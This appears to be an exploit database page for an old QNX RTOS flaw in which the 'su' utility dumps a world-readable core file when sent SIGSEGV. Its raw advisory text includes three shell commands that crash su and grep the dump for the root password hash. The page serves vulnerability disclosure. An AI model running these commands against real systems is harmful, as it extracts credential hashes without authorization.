header-logo
Suggest Exploit
vendor:
QNX RTOS
by:
SecurityFocus
7.5
CVSS
HIGH
QNX RTOS 'su' Utility Password Hash Disclosure
N/A
CWE
Product Name: QNX RTOS
Affected Version From: QNX RTOS
Affected Version To: QNX RTOS
Patch Exists: YES
Related CWE: N/A
CPE: o:qnx:qnx_rtos
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

QNX RTOS ‘su’ Utility Password Hash Disclosure

It has been reported that the 'su' utility for QNX RTOS accepts the SIGSEGV signal and dumps a world readable core file. An attacker is able to analyze the core file and obtain very sensitive information. By sending a SIGSEGV signal to the 'su' process, an attacker can obtain a copy of the root user's password hash.

Mitigation:

It is recommended that users of QNX RTOS upgrade to the latest version of the software.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/4914/info

It has been reported that the 'su' utility for QNX RTOS accepts the SIGSEGV signal and dumps a world readable core file. An attacker is able to analyze the core file and obtain very sensitive information.

It is very probable that this is a kernel-based vulnerability affecting not only 'su', but other setuid programs as well 

$su > /dev/null &
$kill -SEGV `ps -A | grep su | awk {'print $1'}`
$strings /var/dumps/su.core | grep ":0:0" > /tmp/mypasswd

The attacker has effectively obtained a copy of the root user's password hash.

Navigation

Suggest Exploit

Services By CQR